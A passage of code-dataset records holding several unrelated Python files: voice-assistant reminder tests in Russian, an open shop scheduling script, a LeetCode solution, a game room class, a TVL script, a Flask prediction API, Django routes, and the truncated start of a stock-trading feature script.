\\\"приготовить ужин\\\" на завтра в 20:00.'\n\n def test_reminder_create_and_cancel(self, alice):\n response = alice('поставь напоминание на завтра сходить погулять в 18 часов')\n assert response.intent == intent.CreateReminder\n assert response.text == 'Поставила напоминание \\\"сходить погулять\\\" на завтра в 18:00.'\n\n response = alice('отмени')\n assert response.intent == intent.CreateReminderCancel\n assert response.text.startswith('Отменила это напоминание.')\n\n def test_reminder_cancel_while_create(self, alice):\n response = alice('напомни приготовить ужин')\n assert response.intent == intent.CreateReminder\n assert re.fullmatch(ReminderResponse.WhatTime, response.text)\n\n response = alice('отмена')\n assert response.intent == intent.CreateReminderCancel\n assert response.text.startswith('Хорошо, отменила.')\n\n @pytest.mark.xfail(reason='https://st.yandex-team.ru/DIALOG-7472')\n def test_reminder_with_cancel_text(self, alice):\n response = alice('поставь напоминание на завтра 20 часов')\n assert response.intent == intent.CreateReminder\n assert re.fullmatch(ReminderResponse.WhatSubject, response.text)\n\n response = alice('закончить')\n assert response.intent == intent.CreateReminderEllipsis\n assert response.text == 'Поставила напоминание \\\"закончить\\\" на завтра в 20:00.'\n\n response = alice('Поставь напоминание на завтра на 5 часов хватит это терпеть')\n assert response.intent == intent.CreateReminder\n assert response.text == 'Поставила напоминание \\\"хватит это терпеть\\\" на завтра в 5:00.'\n\n # ALICE-7832\n def test_reminder_regex_tagger_issues_fix(self, alice):\n response = alice('Алиса, поставь напоминание на завтра в девять часов тридцать утра вынести мусор')\n assert response.intent == intent.CreateReminder\n assert response.text == 'Поставила напоминание \\\"вынести мусор\\\" на завтра в 9:30.'\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Voice Assistant tests/tests/integration_tests/reminders_and_todos/reminders.py","file_name":"reminders.py","file_ext":"py","file_size_in_byte":14325,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29788563086","text":"from __future__ import print_function, division\n\nimport sys\n\nimport matplotlib.patches as mpatch\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom copy import deepcopy\nfrom itertools import groupby, chain\n\n\n# # Read processing times from the file\n# def parse_problem(filename, k=1):\n# \"\"\"Parse the kth instance of a Taillard problem file\n#\n# The Taillard problem files are a standard benchmark set for the problem\n# of flow shop scheduling. They can be found online at the following address:\n# - http://mistic.heig-vd.ch/taillard/problemes.dir/ordonnancement.dir/ordonnancement.html\"\"\"\n#\n# with open(filename, 'r') as f:\n# # Identify the string that separates instances\n# problem_line = '/number of jobs, number of machines, time seed, machine seed, upper bound, lower bound :/'\n#\n# # Strip spaces and newline characters from every line\n# lines = map(str.strip, f.readlines())\n#\n# # We prep the first line for later\n# lines[0] = '/' + lines[0]\n#\n# # We also know '/' does not appear in the files, so we can use it as\n# # a separator to find the right lines for the kth problem instance\n# try:\n# proctimes = '/'.join(lines).split(problem_line)[k].split('/machines')[0].split('/')[2:]\n# machines = '/'.join(lines).split(problem_line)[k].split('/machines')[1].split('/')[1:]\n# except IndexError:\n# max_instances = len('/'.join(lines).split(problem_line)) - 1\n# print(\"\\nError: Instance must be within 1 and %d\\n\" % max_instances)\n# sys.exit(0)\n#\n# # Split every line based on spaces and convert each item to an int\n# data = [map(int, line.split()) for line in proctimes]\n#\n# machines = [map(int, line.split()) for line in machines]\n#\n# # We return the zipped data to rotate the rows and columns, making each\n# # item in data the durations of tasks for a particular job\n# return data, machines\n#\n#\n# filename = 'instances/Openshop/tai5_5.txt'\n# processing_times, machines = parse_problem(filename, 1) # a list of [job number] [machine number]\n# numberOfJobs = len(processing_times)\n# numberOfMachines = len(processing_times[0])\n# NDIM = numberOfMachines * numberOfJobs\n# # print(processing_times)\n#\n#\n# new_ptimes = []\n# for idx, job in enumerate(processing_times):\n# newlist = sorted(zip(machines[idx], job))\n# ptimes_inorder = [element[1] for element in newlist]\n# new_ptimes.append(ptimes_inorder)\n#\n# numberOfMachines = 4\n# numberOfJobs = 4\n# processing_times = [item for sublist in new_ptimes for item in sublist]\n# operation_numbers_dictionary = {i: (i % numberOfMachines, i // numberOfMachines)\n# for i in range(NDIM)} # i : (machine number, job number)\n\n\nclass Problem(object):\n \"\"\"\n Reads and parses Open Shop Scheduling Problem\n \"\"\"\n\n def __init__(self, filename, instance):\n self.filename = filename\n self.instance = instance\n self.numberOfJobs = 0\n self.numberOfMachines = 0\n self.processing_times = None\n self.operation_numbers_dictionary = None\n self.dimension = 0\n self.machineOrder = None\n self.due_dates = None\n self.parse_problem()\n\n def parse_problem(self):\n \"\"\"Parse the kth instance of a Taillard problem file\n\n The Taillard problem files are a standard benchmark set for the problem\n of flow shop scheduling. They can be found online at the following address:\n - http://mistic.heig-vd.ch/taillard/problemes.dir/ordonnancement.dir/ordonnancement.html\"\"\"\n\n with open(self.filename, 'r') as f:\n # Identify the string that separates instances\n problem_line = '/number of jobs, number of machines, time seed, machine seed, upper bound, lower bound :/'\n\n # Strip spaces and newline characters from every line\n lines = list(map(str.strip, f.readlines()))\n\n # We prep the first line for later\n lines[0] = '/' + lines[0]\n\n # We also know '/' does not appear in the files, so we can use it as\n # a separator to find the right lines for the kth problem instance\n try:\n proctimes = '/'.join(lines).split(problem_line)[self.instance].split('/machines')[0].split('/')[2:]\n machines = '/'.join(lines).split(problem_line)[self.instance].split('/machines')[1].split('/')[1:]\n except IndexError:\n max_instances = len('/'.join(lines).split(problem_line)) - 1\n print(\"\\nError: Instance must be within 1 and %d\\n\" % max_instances)\n sys.exit(0)\n\n # Split every line based on spaces and convert each item to an int\n self.processing_times = [list(map(int, line.split())) for line in proctimes]\n\n self.numberOfJobs = len(self.processing_times)\n self.numberOfMachines = len(self.processing_times[0])\n self.dimension = self.numberOfJobs * self.numberOfMachines\n\n self.operation_numbers_dictionary = {i: (i % self.numberOfMachines, i // self.numberOfMachines)\n for i in range(self.dimension)} # Operation : (Machine Nu., Job Nu.)\n\n self.machineOrder = [map(int, line.split()) for line in machines]\n\n self.sort_problem()\n\n def sort_problem(self):\n new_ptimes = np.zeros((self.numberOfJobs, self.numberOfMachines), dtype=np.uint8)\n for i, job in enumerate(self.processing_times):\n newlist = sorted(zip(self.machineOrder[i], job))\n for j, ptime in enumerate(newlist):\n new_ptimes[i, j] = ptime[1]\n self.due_dates = np.sum(new_ptimes, axis=1) # tight due dates\n self.processing_times = new_ptimes.flatten()\n\n\ndef gannt_chart(problem, schedule):\n \"\"\" \n Compiles a scheduling on the machines given a permutation of jobs \n with no time gap checking\n \"\"\"\n\n flag_print = False\n\n # Note that using [[]] * m would be incorrect, as it would simply\n # copy the same list m times (as opposed to creating m distinct lists).\n gantt_chart = [[] for _ in range(problem.numberOfMachines)]\n\n for operation in schedule:\n machine_number = problem.operation_numbers_dictionary[operation][0]\n job_number = problem.operation_numbers_dictionary[operation][1]\n proc_time = problem.processing_times[operation]\n\n # check if this job is being processed in any other machine\n completion_time_list = []\n time_interval_list = []\n for machine in range(problem.numberOfMachines):\n # dont check the machine to be scheduled since one job can be scheduled only once.\n # Check other machines\n if machine != machine_number:\n # check if the other machines had operations scheduled before\n if len(gantt_chart[machine]) != 0:\n for j in range(len(gantt_chart[machine])):\n # check the job numbers on other machines\n # and determine if the machine processed an operation of the job\n # to be scheduled now\n if gantt_chart[machine][j][0] == job_number:\n # put completion times of the job on other machines into a list\n s_time = gantt_chart[machine][j][1] # start time of the job on the other machine\n c_time = gantt_chart[machine][j][-1] # completion time of the job on other machine\n completion_time_list.append(c_time)\n time_interval_list.append((s_time, c_time))\n time_interval_list.sort(key=lambda x: x[0])\n\n # determine the maximum completion time for this job on other machines\n if len(completion_time_list) != 0:\n other_machine_ending_time = max(completion_time_list)\n\n else:\n # this job has no previous operation\n other_machine_ending_time = 0\n\n # determine the completion time of the last operation (available time) on the required machine\n num_of_jobs_on_current_machine = len(gantt_chart[machine_number])\n if num_of_jobs_on_current_machine == 0:\n current_machine_available_time = 0\n else:\n current_machine_available_time = gantt_chart[machine_number][-1][-1]\n\n f_intersection = True\n while True:\n if len(time_interval_list) != 0:\n for times in time_interval_list:\n\n intersection = range(max(current_machine_available_time, times[0]),\n min(current_machine_available_time + proc_time, times[1]))\n # intersection = min(proc_time, times[1]) + 1 - max(current_machine_available_time, times[0])\n if len(intersection) > 0:\n current_machine_available_time = times[1]\n f_intersection = True\n break\n else:\n f_intersection = False\n else:\n break\n\n if not f_intersection:\n break\n\n completion_time = current_machine_available_time + proc_time\n gantt_chart[machine_number].append((job_number, current_machine_available_time,\n proc_time, completion_time))\n return gantt_chart\n\n\ndef gannt_chart2(problem, schedule):\n \"\"\"Compiles a scheduling on the machines given a permutation of jobs\n with checikng time gaps\"\"\"\n\n flag_print = False\n\n # Note that using [[]] * m would be incorrect, as it would simply\n # copy the same list m times (as opposed to creating m distinct lists).\n gantt_chart = [[] for _ in range(problem.numberOfMachines)]\n\n for operation in schedule:\n machine_number = problem.operation_numbers_dictionary[operation][0]\n job_number = problem.operation_numbers_dictionary[operation][1]\n proc_time = problem.processing_times[operation]\n\n # check if this job is being processed in any other machine\n completion_time_list = []\n time_interval_list = []\n for machine in range(problem.numberOfMachines):\n # dont check the machine to be scheduled since one job can be scheduled only once.\n # Check other machines\n if machine != machine_number:\n # check if the other machines had operations scheduled before\n if len(gantt_chart[machine]) != 0:\n for j in range(len(gantt_chart[machine])):\n # check the job numbers on other machines\n # and determine if the machine processed an operation of the job\n # to be scheduled now\n if gantt_chart[machine][j][0] == job_number:\n # put completion times of the job on other machines into a list\n s_time = gantt_chart[machine][j][1] # start time of the job on the other machine\n c_time = gantt_chart[machine][j][-1] # completion time of the job on other machine\n completion_time_list.append(c_time)\n time_interval_list.append((s_time, c_time))\n time_interval_list.sort(key=lambda x: x[0])\n\n # determine the maximum completion time for this job on other machines\n if len(completion_time_list) != 0:\n other_machine_ending_time = max(completion_time_list)\n\n else:\n # this job has no previous operation\n other_machine_ending_time = 0\n\n # determine the completion time of the last operation (available time) on the required machine\n num_of_jobs_on_current_machine = len(gantt_chart[machine_number])\n gaps = []\n if num_of_jobs_on_current_machine == 0:\n current_machine_available_time = 0\n current_machine_available_time = check_intersection(time_interval_list, proc_time,\n current_machine_available_time)\n else:\n # find gaps and put them in a list\n for i in range(num_of_jobs_on_current_machine):\n if i == 0:\n first_job_start_time = gantt_chart[machine_number][i][1] - 0\n if first_job_start_time > 0:\n gaps.append((0, first_job_start_time))\n else:\n following_job_start_time = gantt_chart[machine_number][i][1]\n previous_job_end_time = gantt_chart[machine_number][i - 1][3]\n time_gap = following_job_start_time - previous_job_end_time\n if time_gap > 0:\n gaps.append((previous_job_end_time, following_job_start_time))\n\n if len(gaps) == 0:\n # there are no gaps so the current available time is the last operation completion time\n current_machine_available_time = gantt_chart[machine_number][-1][-1]\n # check if there are no operation of the job on other machines and if there is an\n # intersection delay the current machine available time\n current_machine_available_time = check_intersection(time_interval_list, proc_time,\n current_machine_available_time)\n else: # there are gaps\n flag_break_loop = False\n for times in gaps:\n # check if the operation processing time fits in the time gaps on this machine\n if times[1] - times[0] >= proc_time:\n # If operation processing time fits the time gap, then current machine is available\n # at the start of the time gap so set it with times[0]\n current_machine_available_time = times[0]\n if len(time_interval_list) != 0:\n # check if this gap intersects with other machines\n for times in time_interval_list:\n intersection = min(current_machine_available_time + proc_time, times[1]) - max(\n current_machine_available_time, times[0])\n if intersection > 0:\n break # there is an intersection so break the loop\n else:\n # te job fits the time gap and it doesnt have intersection with other\n # operations on other machines therefore schedule it in the time gap\n # current_machine_available_time = times[0]\n flag_break_loop = True\n if flag_break_loop:\n break\n else:\n current_machine_available_time = gantt_chart[machine_number][-1][-1]\n # check if there are no operation of the job on other machines and if there is an\n # intersection delay the current machine available time\n current_machine_available_time = check_intersection(time_interval_list, proc_time,\n current_machine_available_time)\n\n completion_time = current_machine_available_time + proc_time\n gantt_chart[machine_number].append((job_number, current_machine_available_time,\n proc_time, completion_time))\n return gantt_chart\n\n\n# OSSP_GA_OOP.py icinden aldigin class fonksiyonu\ndef gannt_chart3(problem, schedule, flag):\n \"\"\"\n Compiles a scheduling on the machines given a permutation of jobs \n with the option of time gap checking\n \"\"\"\n\n fForceOrder = flag\n fRepair = False\n\n # Note that using [[]] * m would be incorrect, as it would simply\n # copy the same list m times (as opposed to creating m distinct lists).\n\n gantt_chart = [[] for _ in range(problem.numberOfMachines)]\n\n for operation in schedule:\n machine_number = problem.operation_numbers_dictionary[operation][0]\n job_number = problem.operation_numbers_dictionary[operation][1]\n proc_time = problem.processing_times[operation]\n\n # determine the processing times of the job on other machines\n time_interval_list = []\n for machine in range(problem.numberOfMachines):\n # dont check the machine to be scheduled since one job can be scheduled only once.\n # Check other machines if they have operations scheduled before\n if machine != machine_number and len(gantt_chart[machine]) != 0:\n for j in range(len(gantt_chart[machine])):\n # check the job numbers on other machines\n # and determine if the machine processed an operation of the job\n # to be scheduled now\n if gantt_chart[machine][j][0] == job_number:\n # put completion times of the job on other machines into a list\n s_time = gantt_chart[machine][j][1] # start time of the job on the other machine\n c_time = gantt_chart[machine][j][-1] # completion time of the job on other machine\n\n time_interval_list.append((s_time, c_time))\n time_interval_list.sort(key=lambda x: x[0]) # sort the list according to start time\n\n # determine the completion time of the last operation (available time) on the required machine\n num_of_jobs_on_current_machine = len(gantt_chart[machine_number])\n\n if not fForceOrder: # eger kromozomdaki makinelere dusen is sirasi gozetilmeyecekse\n # first find the gaps on the machine to be scheduled\n if num_of_jobs_on_current_machine != 0:\n gaps = []\n current_starttime2check = 0\n for op in (gantt_chart[machine_number]):\n if current_starttime2check == op[1]: # if start time equals to the operations start time\n current_starttime2check = op[3] # then update start time to operations end time\n else:\n gap = (current_starttime2check, op[1])\n gaps.append(gap)\n current_starttime2check = op[3]\n\n # if there are gaps on the current machine check if it can be scheduled on those gaps\n if gaps:\n for space in gaps:\n current_machine_available_time = space[0]\n # Narrow the gap by checking other machines\n time_to_schedule = check_overlap_othmach(time_interval_list, proc_time,\n current_machine_available_time)\n\n space = (time_to_schedule, space[1])\n # check if there is an overlap on the current machine\n foverlap = check_overlap_curmach(space, proc_time)\n\n if not foverlap: # if there is no overlap on the current machine\n time_to_schedule = space[0]\n fRepair = True\n break\n else: # if operation doesnt fit in the gap\n # replace the available time with last operation's end time\n current_machine_available_time = gantt_chart[machine_number][-1][-1]\n time_to_schedule = check_overlap_othmach(time_interval_list, proc_time,\n current_machine_available_time)\n\n else: # if there are no gaps\n current_machine_available_time = gantt_chart[machine_number][-1][-1]\n time_to_schedule = check_overlap_othmach(time_interval_list, proc_time,\n current_machine_available_time)\n else:\n current_machine_available_time = 0\n time_to_schedule = check_overlap_othmach(time_interval_list, proc_time, current_machine_available_time)\n else: # keep the order of schedule\n if num_of_jobs_on_current_machine == 0:\n current_machine_available_time = 0\n else: # buradan emin degilim\n current_machine_available_time = gantt_chart[machine_number][-1][-1] # for order enforced case\n time_to_schedule = check_overlap_othmach(time_interval_list, proc_time, current_machine_available_time)\n\n completion_time = time_to_schedule + proc_time\n gantt_chart[machine_number].append((job_number, time_to_schedule,\n proc_time, completion_time))\n gantt_chart[machine_number].sort(key=lambda x: x[1])\n if fRepair:\n repair_chromosome(schedule, gantt_chart, problem)\n return gantt_chart\n\n\ndef check_intersection(time_interval_list, proc_time, current_machine_available_time):\n while True:\n if len(time_interval_list) != 0:\n for times in time_interval_list:\n intersection = min(current_machine_available_time + proc_time, times[1]) - max(\n current_machine_available_time, times[0])\n if intersection > 0:\n current_machine_available_time = times[1]\n f_intersection = True\n break\n else:\n f_intersection = False\n else:\n break\n\n if not f_intersection:\n break\n return current_machine_available_time\n\n\ndef check_overlap_othmach(time_interval_list, proc_time, current_machine_available_time):\n if len(time_interval_list) != 0:\n for s_time, c_time in time_interval_list:\n range_set = set(range(current_machine_available_time,\n current_machine_available_time + proc_time + 1))\n overlap = range_set.intersection(set(range(s_time, c_time)))\n if overlap:\n current_machine_available_time = c_time\n\n time_to_schedule = current_machine_available_time\n else:\n time_to_schedule = current_machine_available_time\n\n return time_to_schedule\n\n\ndef check_overlap_curmach(gap, proc_time):\n if gap[1] - gap[0] < proc_time:\n return True\n return False\n\n\ndef repair_chromosome(schedule, gchart, problem):\n elements = problem.numberOfMachines * problem.numberOfJobs\n original = np.empty(elements, dtype=object)\n for i, operation in enumerate(schedule):\n original[i] = problem.operation_numbers_dictionary[operation]\n\n chart = deepcopy(gchart)\n dtype = [('operation', 'object'), ('start_time', 'int'), ('proc_time', 'int'), ('end_time', 'int')]\n chart = np.array(chart, dtype=dtype).flatten()\n\n for i, operation in enumerate(chart):\n machine_number = i // problem.numberOfMachines\n operation = ((machine_number, operation[0]), operation[1], operation[2], operation[3])\n chart[i] = operation\n\n chart = np.sort(chart, order='start_time')\n chart = [list(grp) for k, grp in groupby(chart, key=lambda x: x[1])]\n repaired = list(map(extract, chart))\n indices = {b: i for i, b in enumerate(original)}\n for sublist in repaired:\n if len(sublist) > 1:\n sublist.sort(key=lambda x: indices[x])\n del indices, chart, elements\n repaired = list(chain(*repaired))\n rev_dict = {value: key for key, value in problem.operation_numbers_dictionary.items()}\n repaired = list(map(lambda x: rev_dict[x], repaired))\n return repaired\n\n\ndef extract(sublist):\n if len(sublist) > 1:\n operations = [operation[0] for operation in sublist]\n else:\n operations = [sublist[0][0]]\n return operations\n\n\n# Define Objective Function\ndef makespan(problem, schedule, flag):\n gannt_chrt = gannt_chart3(problem, schedule, flag)\n ctimes = []\n for machine in range(problem.numberOfMachines):\n ctimes.append(gannt_chrt[machine][-1][-1])\n make_span = max(ctimes)\n return gannt_chrt, make_span # return a tuple for compatibility\n\n\ndef plot_gannt(machine_times, problem, ms):\n \"\"\"\n Plots the gannt chart of the given gannt chart data structure\n :param machine_times: gannt chart data structure\n :param ms: makespan value\n :return: None \n \"\"\"\n fig, ax = plt.subplots()\n facecolors = ('blue', 'red', 'yellow', 'green', 'grey', 'azure', 'plum',\n 'wheat', 'brown', 'chocolate', 'coral', 'cyan', 'darkblue',\n 'gold', 'khaki', 'lavender', 'lime', 'magenta', 'orange',\n 'pink')\n bar_start = 10\n bar_width = 9\n increment = 10\n for i in range(problem.numberOfMachines):\n for j in range(problem.numberOfJobs):\n datalist = [machine_times[i][j][1:3]]\n ax.broken_barh(datalist, (bar_start, bar_width),\n facecolors=facecolors[machine_times[i][j][0]])\n bar_start += increment\n\n ax.set_ylim(5, 115)\n ax.set_xlim(0, ms)\n ytickpos = range(15, 85, 10)\n ax.set_yticks(ytickpos)\n yticklabels = ['Machine ' + str(i + 1) for i in range(problem.numberOfMachines)]\n ax.set_yticklabels(yticklabels)\n ax.grid(True)\n\n fakeredbar = mpatch.Rectangle((0, 0), 1, 1, fc=\"r\")\n fakebluebar = mpatch.Rectangle((0, 0), 1, 1, fc=\"b\")\n fakeyellowbar = mpatch.Rectangle((0, 0), 1, 1, fc=\"y\")\n fakegreenbar = mpatch.Rectangle((0, 0), 1, 1, fc=\"green\")\n fakegreybar = mpatch.Rectangle((0, 0), 1, 1, fc=\"grey\")\n fakeazurebar = mpatch.Rectangle((0, 0), 1, 1, fc='azure')\n fakeplumbar = mpatch.Rectangle((0, 0), 1, 1, fc='plum')\n\n plt.legend([fakebluebar, fakeredbar, fakeyellowbar, fakegreenbar, fakegreybar, fakeazurebar, fakeplumbar],\n ['Job1', 'Job2', 'Job3', 'Job4', 'Job5', 'Job6', 'Job7'])\n plt.show()\n\n\ndef main():\n # random.seed(1250)\n ossp_problem = Problem(filename='instances/Openshop/tai4_4.txt', instance=1)\n schedule = np.array([12, 0, 7, 2, 6, 3, 13, 5, 1, 4, 14, 11, 10, 15, 8, 9])\n # schedule = np.array([12, 7, 2, 11, 6, 1, 0, 13, 9, 5, 14, 3, 10, 15, 4, 8]) #repaired\n fForceOrder = False\n print(schedule)\n gchart, ms = makespan(ossp_problem, schedule, fForceOrder)\n\n for idx, machine in enumerate(gchart):\n print('Machine ' + str(idx), ' :', machine)\n print(ms)\n plot_gannt(gchart, ossp_problem, ms)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tugyanalper/OSSPPy","sub_path":"scratchpad.py","file_name":"scratchpad.py","file_ext":"py","file_size_in_byte":26943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"74674874322","text":"class Solution:\n def maxIceCream(self, costs: List[int], coins: int) -> int:\n freq = defaultdict(int)\n for c in costs:\n freq[c] += 1\n\n result = 0\n # least expensive first\n for f in sorted(freq):\n if f > coins:\n break\n # greedy: take as much as possible / available\n take = min(coins // f, freq[f])\n coins -= take * f\n result += take\n return result\n","repo_name":"stbrumme/leetcode","sub_path":"1833.py","file_name":"1833.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"30117512337","text":"from __future__ import annotations\n\nfrom pygame import Vector2\nfrom typing import TYPE_CHECKING, Optional\n\nfrom ..facilityroom import DMFacilityRoom\nfrom utilities import UnlockPack, Effect\n\nif TYPE_CHECKING:\n from dm.core.contexts import AttackContext\n from dm.core.game.game import DMGame\n################################################################################\n\n__all__ = (\"SpecialOpsRoom\",)\n\n################################################################################\nclass SpecialOpsRoom(DMFacilityRoom):\n\n def __init__(self, game: DMGame, position: Optional[Vector2] = None, level: int = 1):\n\n super().__init__(\n game, position,\n _id=\"ROOM-190\",\n name=\"Special Ops Room\",\n description=(\n \"Increases damage inflicted to enemies by adjacent traps \"\n \"by {value} %.\"\n ),\n level=level,\n rank=5,\n unlock=UnlockPack.Advanced,\n effects=[\n Effect(name=\"scalar\", base=30, per_lv=2),\n ]\n )\n\n################################################################################\n def handle(self, ctx: AttackContext) -> None:\n\n if ctx.source in self.adjacent_rooms:\n ctx.amplify_pct(self.effects[\"scalar\"])\n\n################################################################################\n","repo_name":"AllegroVivo/DungeonDefense","sub_path":"dm/rooms/FiveStar/SpecialOpsRoom.py","file_name":"SpecialOpsRoom.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"30099986906","text":"#!/usr/local/bin/python3\n\"\"\"\nSuppose the following records as records appended from anonymous fns.\n\"\"\"\nimport typing\nimport json\n\n\nclass State:\n epochs: int\n tvl: int\n\n def __init__(self):\n self.epochs = 0\n self.tvl = 0\n\n\nclass TvlT:\n epochs: int\n\n def __init__(self):\n self.epoch = 0\n self.tvl_sum = 0\n\n\n\"\"\"\nbucket_tvl_t: {\n \"state_epochs\": {\n \"tvl\": 0,\n \"epoch\": 1648857973,\n }\n}\n\"\"\"\nbucket_tvl_t: typing.Dict = {}\nbucket_tvl_over_t: typing.List = [\n {\n \"sum\": 50,\n \"epoch\": 151,\n },\n {\n \"sum\": 500,\n \"epoch\": 261,\n },\n {\n \"sum\": 590,\n \"epoch\": 301,\n },\n {\n \"sum\": 690,\n \"epoch\": 404,\n },\n {\n \"sum\": 710,\n \"epoch\": 503,\n },\n {\n \"sum\": 850,\n \"epoch\": 690,\n },\n {\n \"sum\": 950,\n \"epoch\": 710,\n },\n]\n\n\nif __name__ == \"__main__\":\n state = State()\n for tvl_epoch in bucket_tvl_over_t:\n state.tvl += tvl_epoch[\"sum\"]\n bucket_tvl_t[f\"{state.epochs}\"] = {\n \"tvl\": state.tvl,\n \"epoch\": tvl_epoch[\"epoch\"],\n }\n print(f\"tvl bucket - epoch: {state.epochs}\", state.tvl)\n state.epochs += 1\n\n latest_tvl = json.dumps(\n bucket_tvl_t[f\"{state.epochs-1}\"], default=lambda x: x.__dict__, indent=\" \"\n )\n historical_tvl = json.dumps(bucket_tvl_t, default=lambda x: x.__dict__, indent=\" \")\n print(historical_tvl, \"\", f\"latest - {latest_tvl}\", sep=\"\\n\")\n\n for i in range(0, state.epochs):\n t_tvl = json.dumps(\n bucket_tvl_t[f\"{i}\"], default=lambda x: x.__dict__, indent=\" \"\n )\n print(i, t_tvl)\n\n state_json = json.dumps(state, default=lambda x: x.__dict__, indent=\" \")\n print(state_json)\n\n","repo_name":"whymidnight/Terra-Native-Token-Staking","sub_path":"contracts/market/utils/queries/tvl_over_time.py","file_name":"tvl_over_time.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"25119223260","text":"from flask import Flask, request\nfrom flask_restx import Resource, Api, fields\nimport joblib\n\napp = Flask(__name__)\napi = Api(app)\n\nns = api.namespace('health_charges', description='Health Insurance Charges')\n\ncustomer = api.model('customer', {\n 'age': fields.Integer(required=True, description='Age'),\n 'gender_code': fields.Integer(required=True, description='Gender Code - 0: F, 1: M'),\n 'bmi': fields.Float(required=True, description='BMI'),\n 'children': fields.Integer(required=True, description='Number of children'),\n 'smoker_code': fields.Integer(required=True, description='Smoker Code - 0: No, 1: Yes')\n })\n\nmodel = joblib.load('health_charges_classifier_model.joblib')\n\n@ns.route('/')\nclass Review(Resource):\n def get(self):\n return {'response': 'health charges classifier is running'}\n\n @ns.expect(customer)\n def post(self):\n print('payload:')\n print(api.payload)\n\n prediction = model.predict_proba([[api.payload['age'],\n api.payload['gender_code'],\n api.payload['bmi'],\n api.payload['children'],\n api.payload['smoker_code']]])[0]\n print('prediction: ' + str(prediction))\n\n max_prob = max(prediction)\n class_idx = list(prediction).index(max_prob)\n\n return {'customer': api.payload,\n 'class': class_idx,\n 'probability': max_prob}\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=8080)\n","repo_name":"fcallaly/sklearn-health-charges","sub_path":"app/flask_health_charges.py","file_name":"flask_health_charges.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"36834130384","text":"\nfrom django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"cadastro\", views.CadastroFormView.as_view(), name=\"cadastro\"),\n path(\"generos\", views.generos, name=\"generos\"),\n path(\"leitura\", views.PostListView.as_view(), name=\"leitura\"), #renderizando a view como ListView\n # path(\"entrar\", views.entrar, name=\"entrar\"),\n path(\"accounts/\", include(\"django.contrib.auth.urls\")),\n path(\"cadastro\", views.sair),\n path(\"post//\", views.PostDetailView.as_view(), name=\"detalhes\"), #view para uma coisa\n]#tbm pode ser feito com int:pk, se eu quiser usar chave primária","repo_name":"Dargouls/eBookReader-Django","sub_path":"Booper/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"28228715469","text":"\"\"\"Convert model to response.\"\"\"\nfrom app.api.database.models.user import UserSchema\n\n\ndef convert_user_model_to_response(user: UserSchema):\n \"\"\"Convert user model for response.\"\"\"\n return {\n \"userID\": user.userID,\n \"userName\": user.username,\n \"role\": user.role,\n \"createAt\": user.createAt,\n \"updateAt\": user.updateAt,\n }\n","repo_name":"khanh41/fastapi-mongodb-base-project","sub_path":"{{cookiecutter.project_slug}}/app/api/responses/model2reponse.py","file_name":"model2reponse.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"3"}
+{"seq_id":"26193819154","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 16 12:18:09 2021\r\n\r\n@author: Sahil\r\n\"\"\"\r\n\r\n#importing packages\r\nimport pandas as pd\r\nimport numpy as np\r\nimport datetime as dt\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.stats import mstats\r\nimport pickle\r\n\r\n#from hidden_markov_model import get_volatility\r\nfrom helpers import *\r\n\r\npd.options.display.max_columns = None\r\npd.options.display.max_rows = None\r\n\r\nclusters_df = pd.read_csv('./files/clusters/clusters.csv')\r\nclusters_df = clusters_df[['Cluster','Companies','NIFTY_INDEX']]\r\n\r\nall_data = pd.read_csv('./files/all_stock_data_with_indicators.csv')\r\nall_data.Date = pd.to_datetime(all_data.Date)\r\nall_data = all_data.set_index('Date')\r\n\r\nall_data['Close_Shifted'] = all_data.groupby('symbol')['Close'].transform(lambda x: x.shift(-19))\r\nall_data['Target'] = ((all_data['Close_Shifted'] - all_data['Open'])/(all_data['Open']) * 100).shift(-1)\r\nall_data['Target_Direction'] = np.where(all_data['Target']>0,1,0)\r\nall_data = all_data.dropna().copy() \r\n\r\n\r\nTarget_variables = ['SMA_ratio','ATR_5','ATR_15','ATR_Ratio',\r\n 'ADX_5','ADX_15','SMA_Volume_Ratio','Stochastic_5','Stochastic_15','Stochastic_Ratio',\r\n 'RSI_5','RSI_15','RSI_ratio','MACD']\r\n\r\nfor variable in Target_variables:\r\n all_data.loc[:,variable] = mstats.winsorize(all_data.loc[:,variable], limits = [0.1,0.1])\r\n\r\n\r\ntrain_data = all_data.loc[:'2018-12-31',]\r\ntest_data = all_data.loc['2019-01-01':]\r\n\r\n\r\n# to test individual helper functions \r\ntest_df = pd.DataFrame()\r\n#test_df_trend = get_trend_slope(test_df) \r\n#test_df_buy_value = get_buy_value(test_df)\r\n#est_df_stoploss = cut_losses_at(0.05,test_df_buy_value)\r\n#est_list_levels = get_levels('ACC.NS','2019-01-01')\r\n\r\n#test_df_get_nearest_support_resistance = get_nearest_support_resistance(test_df)\r\n#test_df_risk_reward = get_risk_reward(test_df_get_nearest_support_resistance)\r\n#test_df_execute_trade = execute_trade_with_levels(test_df_risk_reward)\r\n#test_df_index_change = get_index_change(test_df)\r\n\r\n# -----------------------------------------------TESTING----------------------------------\r\n\r\n\r\n# isoweekday: Monday is 1 and Sunday is 7\r\ntrading_holidays= 